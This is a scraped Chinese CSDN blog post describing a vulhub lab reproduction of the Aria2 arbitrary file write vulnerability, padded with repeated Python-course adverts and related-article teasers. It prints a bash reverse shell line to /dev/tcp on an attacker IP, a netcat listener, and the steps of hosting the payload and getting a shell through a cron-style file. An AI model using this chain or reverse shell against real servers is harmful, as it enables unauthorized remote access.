08 - vulhub - Aria2 任意文件写入漏洞,美团面试在线编程

最新推荐文章于 2024-06-28 14:41:12 发布
最新推荐文章于 2024-06-28 14:41:12 发布
阅读量1k 收藏 13
点赞数 8
分类专栏: 2024年程序员学习 文章标签: 面试 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58397123/article/details/137837258
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新Python全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img



既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Python知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip1024c (备注Python)
img

正文

在这里插入图片描述

Settings,然后保存。

在这里插入图片描述

此时,我们需要点击 add 添加一个下载任务。

这个时候,比较坑的地方来了,我们需要提供一下下载地址和文件。

可以利用 python 在本地目录临时搭建模拟一个服务器,参考 “使用python在本地指定的目录临时模拟服务器”

并准备 payload 下载文件

#!/bin/bash

/bin/bash -i >& /dev/tcp/192.168.8.137/6666 0>&1

在这里插入图片描述

从网上查阅的资料来看,crontab 文件的格式如果最后一行没有换行符,也就是 “\n” 的情况下极有可能会反弹不成功,这里我们还是加上一下吧。

在这里插入图片描述

再回到添加下载任务这一步,添加我们的临时服务器地址。

在这里插入图片描述

在这里插入图片描述

开启本地监听

nc -lvvp 6666

进入容器,发现文件已经成功下载,证明写入文件成功。但是等了半天也没有监听到,百思不得其解。

在这里插入图片描述

验证漏洞利用是否成功并反弹

其实写入文件之后已经证实了该漏洞的可利用性。但是,我又想反弹,所以踩坑了…

最后在一篇博文看到,大概率是靶场环境不完整导致的,导致它定时任务动不了。

那么我们给这个文件执行权限并启动好了。

这里有个比较坑的情况

就是 我一共让其下载了2个文件

在这里插入图片描述

第一次下载的是 shell ,这个文件反弹的是我本地私有IP 192.168.8.137 ,在我进入容器 赋予 shell 文件可执行权限时,并没有反弹回来,报错超时。

在这里插入图片描述

第二次的 test 文件我是借了朋友的VPS,在他的VPS上利用python临时模拟了一个服务器,将 定时任务文件放在临时服务器的目录下,执行下载操作,并开启了 7777 端口监听。

此时,我再次进入容器,赋予了 test 文件 777 权限,并执行。

反弹成功。

在这里插入图片描述

在这里插入图片描述

修复建议

如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费学习大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。

一、Python所有方向的学习路线

Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、学习软件

工欲善其必先利其器。学习Python常用的开发软件都在这里了,给大家节省了很多时间。

三、全套PDF电子书

书籍的好处就在于权威和体系健全,刚开始学习的时候你可以只看视频或者听某个人讲课,但等你学完之后,你觉得你掌握了,这时候建议还是得去看一下书籍,看权威技术书籍也是每个程序员必经之路。

四、入门学习视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

四、实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。

五、面试资料

我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。

成为一个Python程序员专家或许需要花费数年时间,但是打下坚实的基础只要几周就可以,如果你按照我提供的学习路线以及资料有意识地去实践,你就有很大可能成功!
最后祝你好运!!!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注python)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
你按照我提供的学习路线以及资料有意识地去实践,你就有很大可能成功!
最后祝你好运!!!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注python)
[外链图片转存中…(img-1D1kt5qi-1713267382702)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

前端小雪球
关注
专栏目录
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 1031
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
利用Vulnhub复现漏洞 - Aria2 任意文件写入漏洞
JiangBuLiu的博客
06-28 1354
Aria2 任意文件写入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/aria2/rce/README.zh-cn.md 漏洞原理 Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink...
Aria2 任意文件写入漏洞
EC_Carrot的博客
05-20 456
漏洞背景 Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞复现 我这里是vulhub的环境,环境启动后,访问http://your-ip:6800/,发现服务已启动并且返回404页面。 因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方
[渗透测试] 任意文件包含漏洞
最新发布
Da1NtY的博客
06-28 951
通常,程序开发人员会把函数方法 ”“ 到文件中,这样在需要使用该功能的时候,就可以直接调用(提高代码重用性、减少代码量)。调用文件的过程被称为。造成任意文件包含漏洞是:程序开发人员为了代码的灵活性,常常会将包含文件的路径设为,来进行动态调用,所以被包含文件的路径客户端会被黑客攻击利用。文件包含漏洞在PHP的Web应用中居多,在其他脚本程序中较少。
08 - vulhub - Aria2 任意文件写入漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-18 771
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建`XML-RPC`和`JSON-RPC`接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 776
我的天,这个漏洞的复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
aria-ng-gui:一个 Aria2 图形界面客户端 | An Aria2 GUI for Windows & Linux & MacOS
05-10
AriaNg GUI ...Linux: ~/.config/aria-ng-gui/aria2.conf 或 $XDG_CONFIG_HOME/aria-ng-gui/aria2.conf macOS: ~/Library/Application Support/aria-ng-gui/aria2.conf 使用 npm 安装 npm i -g aria-ng-g
aria-ng-gui-android:一个 Aria2 图形界面安卓客户端 | An Aria2 GUI Android App
04-29
一个 Aria2 图形界面安卓应用程序 特性 集成aria2c 多线程下载 支持PT/BT 多语言支持 支持配置多个 aria2 RPC 使用响应式布局, 支持各种计算机或移动设备 友好的界面交互 支持暗色模式 AriaNg GUI for Android An ...
aria2p:用于通过JSON-RPC与aria2c守护进程交互的命令行工具和库
02-05
aria2c是aria2提供的命令行可执行文件的名称。 它可以充当守护程序。 aria2p (Python的p )是可以与aria2c守护程序进行交互的命令行客户端。 它不是官方客户。 还有其他Python软件包可让您与aria2c守护程序进行...
aria2-ariang-docker:Aria2 + AriaNg +文件浏览器+ Rclone的Docker映像
02-05
aria2-ariang-docker:Aria2 + AriaNg +文件浏览器+ Rclone的Docker映像
Aria2 任意文件写入漏洞复现
whojoe的博客
07-01 1289
Aria2 任意文件写入漏洞复现环境搭建漏洞复现参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/aria2/rce/ 启动容器 docker-compose up -d 查看容器 docker ps 这里kali的ip192.138.164.134 centos的ip192.
Aria2 任意文件编写漏洞
Y01010kk的博客
11-12 829
Aria2 是一款轻量级、多协议、多源下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内置 XML-RPC 和 JSON-RPC 接口。 我们可以使用 RPC 界面操作 aria2 并将文件下载到任何目录,从而导致任意文件编写漏洞 大家看见我这个 估计网上可以找到很多关于这个的文章 在这里 我只将我部署docker环境以及实现aria2 文件漏洞这个实验遇到的问题 给大家分享一下 相信大家都是对这块比较好奇地 我直接从问题开始讲了 在结尾我会把步骤做一个总...
Aria2任意文件写入漏洞
浅笑996的博客
11-26 1789
Aria2 Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。 环境搭建 启动漏洞环境: cd vulhub-master/aria2/rce/ sudo docker-compose up 6800是aria2的RPC服务的默认端口,环境启动后,访问 http://your...
vulhubAria2 任意文件写入漏洞复现
qq_45300786的博客
09-13 255
就一个计划任务反弹shell,应该可以再计划任务,其他的一些任务。 看第一个就是了,最后2个只是补充了一点坑 https://blog.csdn.net/HEAVEN569/article/details/113804954 https://blog.csdn.net/qq_37043565/article/details/118300736 https://blog.csdn.net/qq_36374896/article/details/84191234 ...
Aria2任意文件写入漏洞 漏洞复现
ADummy的博客
02-22 623
Aria2任意文件写入漏洞 by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
如何使用docker容器aria2-pro下载m3u8
08-05
使用 docker 容器 aria2-pro 下载 m3u8 文件的步骤如下: 1. 首先,安装 docker。如果你还没有安装 docker,请参考官方文档或者网上教程进行安装。 2. 下载 aria2-pro 镜像。在命令行中输入以下命令: ``` docker...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值